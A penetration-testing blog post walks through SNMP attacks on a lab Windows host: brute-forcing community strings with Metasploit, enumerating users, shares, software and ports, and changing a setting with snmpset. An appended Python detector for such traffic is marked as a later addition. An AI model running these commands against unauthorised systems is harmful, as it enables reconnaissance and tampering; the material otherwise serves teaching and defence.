Thursday, August 18, 2011

SNMP service enumeration

In a pentest, SNMP is a very juicy service that can give deep insight into the target system and network: a guessable community string hands over hardware details, users, shares, processes and listening ports, and a read-write string lets an attacker change configuration.


Metasploit has a number of auxiliary modules to help in enumerating SNMP on target host(s).
msf > search snmp
Matching Modules
================
   Name                                      Disclosure Date  Rank    Description
   ----                                      ---------------  ----    -----------
   auxiliary/scanner/snmp/aix_version                         normal  AIX SNMP Scanner Auxiliary Module
   auxiliary/scanner/snmp/cisco_config_tftp                   normal  Cisco IOS SNMP Configuration Grabber (TFTP)
   auxiliary/scanner/snmp/cisco_upload_file                   normal  Cisco IOS SNMP File Upload (TFTP)
   auxiliary/scanner/snmp/snmp_enum                           normal  SNMP Enumeration Module
   auxiliary/scanner/snmp/snmp_enumshares                     normal  SNMP Windows SMB Share Enumeration
   auxiliary/scanner/snmp/snmp_enumusers                      normal  SNMP Windows Username Enumeration
   auxiliary/scanner/snmp/snmp_login                          normal  SNMP Community Scanner
   auxiliary/scanner/snmp/snmp_set                            normal  SNMP Set Module
...snip...
We can start by brute-forcing the SNMP service with snmp_login to identify valid community strings; by default it works through Metasploit's snmp_default_pass.txt wordlist.
msf  auxiliary(snmp_enum) > use auxiliary/scanner/snmp/snmp_login
msf  auxiliary(snmp_login) > show options
Module options (auxiliary/scanner/snmp/snmp_login):
   Name              Current Setting                                                  Required  Description
   ----              ---------------                                                  --------  -----------
   BATCHSIZE         256                                                              yes       The number of hosts to probe in each set
   BLANK_PASSWORDS   true                                                             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                yes       How fast to bruteforce, from 0 to 5
   CHOST             172.72.5.1                                                       no        The local client address
   PASSWORD                                                                           no        The password to test
   PASS_FILE         /opt/metasploit_open/msf3/data/wordlists/snmp_default_pass.txt  no        File containing communities, one per line
   RHOSTS            172.72.5.141                                                     yes       The target address range or CIDR identifier
   RPORT             161                                                              yes       The target port
   STOP_ON_SUCCESS   false                                                            yes       Stop guessing when a credential works for a host
   THREADS           1                                                                yes       The number of concurrent threads
   USER_AS_PASS      true                                                             no        Try the username as the password for all users
   VERBOSE           true                                                             yes       Whether to print output for all attempts

msf  auxiliary(snmp_login) > run
[*] 172.72.5.141:161 - SNMP - Trying public...
[+] SNMP: 172.72.5.141 community string: 'public' info: 'Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)'
[*] 172.72.5.141:161 - SNMP - Trying private...
...
[+] SNMP: 172.72.5.141 community string: 'admin' info: 'Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)'
...snip...
[*] Validating scan results from 1 hosts...
[*] Host 172.72.5.141 provides READ-WRITE access with community 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We found two community strings: the default 'public' and a non-default 'admin'. 'public' is a read-only string, while 'admin' grants read-write access (the module confirms this in its "READ-WRITE access" line above).

With this info, we can now go ahead and enumerate the user accounts present on the target.

msf > info auxiliary/scanner/snmp/snmp_enumusers
       Name: SNMP Windows Username Enumeration
     Module: auxiliary/scanner/snmp/snmp_enumusers
    Version: 12107
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  tebo <tebo@attackresearch.com>
 
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COMMUNITY  public           yes       SNMP Community String
  RETRIES    1                yes       SNMP Retries
  RHOSTS     172.72.5.141     yes       The target address range or CIDR identifier
  RPORT      161              yes       The target port
  THREADS    1                yes       The number of concurrent threads
  TIMEOUT    1                yes       SNMP Timeout
  VERSION    1                yes       SNMP Version <1/2c>
 
Description:
  This module will use LanManager OID values to enumerate local user
  accounts on a Windows system via SNMP
msf > use auxiliary/scanner/snmp/snmp_enumusers
 
msf  auxiliary(snmp_enumusers) > run
[+] 172.72.5.141 Found Users: Administrator, Guest, HelpAssistant, IUSR_PLAYGROUND1, IWAM_PLAYGROUND1, SUPPORT_388945a0, playground 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We can also enumerate any open shares on the target using the snmp_enumshares module.
msf > info auxiliary/scanner/snmp/snmp_enumshares
       Name: SNMP Windows SMB Share Enumeration
     Module: auxiliary/scanner/snmp/snmp_enumshares
    Version: 11707
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  tebo <tebo@attackresearch.com>
 
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COMMUNITY  public           yes       SNMP Community String
  RETRIES    1                yes       SNMP Retries
  RHOSTS     172.72.5.141     yes       The target address range or CIDR identifier
  RPORT      161              yes       The target port
  THREADS    1                yes       The number of concurrent threads
  TIMEOUT    1                yes       SNMP Timeout
  VERSION    1                yes       SNMP Version <1/2c>
 
Description:
  This module will use LanManager OID values to enumerate SMB shares
  on a Windows system via SNMP
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf  auxiliary(snmp_enumshares) > run
[+] 172.72.5.141
Python27 -  (C:\Python27)
Shared_field -  (C:\Shared_field)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

To gather more information over SNMP, we can use 'snmpenum'. This handy script uses one of the community strings we identified earlier to collect target system information. We need to give it the target host IP, a community string, and the platform configuration file (windows.txt here, since the target is a Windows box).

root@bt:/pentest/enumeration/snmpenum# ./snmpenum.pl 172.72.5.141 public windows.txt 

----------------------------------------
INSTALLED SOFTWARE
----------------------------------------
Adobe Flash Player 10 ActiveX
FileZilla Client 3.3.5.1
FileZilla Server (remove only)
0xb5546f7272656e74
WinRAR archiver
Java(TM) 6 Update 25
Python 2.7.1
Java(TM) SE Development Kit 6 Update 25
WebFldrs XP
...snip...
----------------------------------------
UPTIME
----------------------------------------
53 minutes, 33.31
----------------------------------------
HOSTNAME
----------------------------------------
PLAYGROUND1
----------------------------------------
USERS
----------------------------------------
Guest
playground
Administrator
HelpAssistant
IUSR_PLAYGROUND1
IWAM_PLAYGROUND1
SUPPORT_388945a0
----------------------------------------
DISKS
----------------------------------------
A:\
C:\ Label:  Serial Number
D:\ Label:GRTMPVOL_EN
Virtual Memory
Physical Memory
----------------------------------------
RUNNING PROCESSES
----------------------------------------
System Idle Process
System
wuauclt.exe
ctfmon.exe
...snip...
VMUpgradeHelper.exe
VMwareUser.exe
logonui.exe
snmptrap.exe
----------------------------------------
LISTENING UDP PORTS
----------------------------------------
161
162
445
500
1032
1039
1045
3456
3527
4500
----------------------------------------
SYSTEM INFO
----------------------------------------
Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)
----------------------------------------
SHARES
----------------------------------------
Python27
Shared_field
C:\Python27
C:\Shared_field
----------------------------------------
LISTENING TCP PORTS
----------------------------------------
25
80
135
443
445
1040
1042
1801
2103
2105
2107
----------------------------------------
SERVICES
----------------------------------------
Server
Themes
Event Log
IIS Admin
...snip...
Background Intelligent Transfer Service
----------------------------------------
DOMAIN
----------------------------------------
WORKGROUP
Another cool SNMP enumeration tool is 'snmpwalk'. We can use it to walk the target's MIB tree and pull back system information.

We need to supply the SNMP version in use, a community string and the target IP. As shown below, it returns each OID it walks together with its type and value:

snmpwalk -v 2c -c public 172.72.5.141 | more
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (96709) 0:16:07.09
SNMPv2-MIB::sysContact.0 = STRING: Target@playground.mil
SNMPv2-MIB::sysName.0 = STRING: PLAYGROUND1
SNMPv2-MIB::sysLocation.0 = STRING: Playground
SNMPv2-MIB::sysServices.0 = INTEGER: 76
IF-MIB::ifNumber.0 = INTEGER: 3
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifIndex.2 = INTEGER: 2
IF-MIB::ifIndex.65540 = INTEGER: 65540
IF-MIB::ifDescr.1 = STRING: MS TCP Loopback interface
IF-MIB::ifDescr.2 = STRING: AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
IF-MIB::ifDescr.65540 = STRING: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
IF-MIB::ifType.1 = INTEGER: softwareLoopback(24)
IF-MIB::ifType.2 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.65540 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifMtu.1 = INTEGER: 1520
IF-MIB::ifMtu.2 = INTEGER: 1500
IF-MIB::ifMtu.65540 = INTEGER: 1500
IF-MIB::ifSpeed.1 = Gauge32: 10000000
IF-MIB::ifSpeed.2 = Gauge32: 1000000000
...snip...
After this, we can use 'snmpget' to collect the value of one specific OID rather than walking the whole tree.

Let's say we want to query the value of OID 'sysLocation.0'.
snmpget -v 2c -c public 172.72.5.141 sysLocation.0
--> SNMPv2-MIB::sysLocation.0 = STRING: Playground
Cool, it has returned the currently configured value.

Remember, we also have a read-write SNMP community string: admin. With the RW community string we can read and modify the target's configuration; an attacker would use it to read or modify a router's running-config, for example.

snmpset, as the name implies, can set OID values when we have the RW community string.
The command below uses the RW string admin to change the value of OID sysLocation.0 from Playground to NewPlayground; the 's' type argument tells snmpset that the value is a string.

snmpset -v 2c -c admin 172.72.5.141 sysLocation.0 s NewPlayground
--> SNMPv2-MIB::sysLocation.0 = STRING: NewPlayground
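The two behaviours shown in this post, community-string guessing (snmp_login above) and SetRequest writes (snmpset), are also what a defender wants to spot in SNMP traffic. The following Python is an added example, not part of the original post: a minimal BER decoder for SNMPv1/v2c community messages and a detection pass over constructed sample packets; the packet builder, the source addresses and the threshold of five distinct guesses are assumptions for illustration.

```python
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA5: "GetBulkRequest"}

def _tlv(buf, pos):
    """Decode one BER TLV at pos; handles short and long definite-length forms."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                 # long form: low 7 bits give the length-octet count
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_snmp(pkt):
    """Return version, community and PDU type of a v1/v2c message, or None if malformed."""
    try:
        tag, body, _ = _tlv(pkt, 0)                  # outer SEQUENCE
        vtag, ver, pos = _tlv(body, 0)               # INTEGER version: 0 = v1, 1 = v2c
        ctag, community, pos = _tlv(body, pos)       # OCTET STRING community
        pdu_tag, _, _ = _tlv(body, pos)              # context-tagged PDU
    except IndexError:
        return None
    if (tag, vtag, ctag) != (0x30, 0x02, 0x04):
        return None
    return {"version": int.from_bytes(ver, "big"), "community": community.decode("latin-1"),
            "pdu": PDU_TYPES.get(pdu_tag, "unknown(0x%02x)" % pdu_tag)}

def build_snmp(version, community, pdu_tag, pdu_body=b"\x02\x01\x01\x02\x01\x00\x02\x01\x00\x30\x00"):
    """Encode a community message (request-id 1, no varbinds); short-form lengths only."""
    def tlv(tag, v):
        return bytes([tag, len(v)]) + v
    return tlv(0x30, tlv(0x02, bytes([version])) + tlv(0x04, community.encode()) + tlv(pdu_tag, pdu_body))

def flag_traffic(packets, guess_threshold=5):
    """packets: iterable of (src_ip, raw_bytes). Returns a list of (src_ip, reason) alerts."""
    seen, alerts = {}, []
    for src, raw in packets:
        msg = parse_snmp(raw)
        if msg is None:
            continue
        if msg["pdu"] == "SetRequest":           # any write is worth an alert on most networks
            alerts.append((src, "SetRequest with community %r" % msg["community"]))
        seen.setdefault(src, set()).add(msg["community"])
        if len(seen[src]) == guess_threshold:    # fire once when the guess count hits the threshold
            alerts.append((src, "%d distinct community strings tried" % guess_threshold))
    return alerts

# Constructed sample traffic (not a capture): a wordlist walk via GetRequest, then one SetRequest.
SAMPLE = [("172.72.5.1", build_snmp(1, c, 0xA0))
          for c in ["public", "private", "admin", "manager", "cisco", "secret"]]
SAMPLE.append(("10.0.0.9", build_snmp(1, "admin", 0xA3)))
```

Feeding real packets in from a capture tool's UDP/161 payloads is the only change needed to run this over live traffic; SNMPv3 messages use a different outer structure and are reported as malformed here.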

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.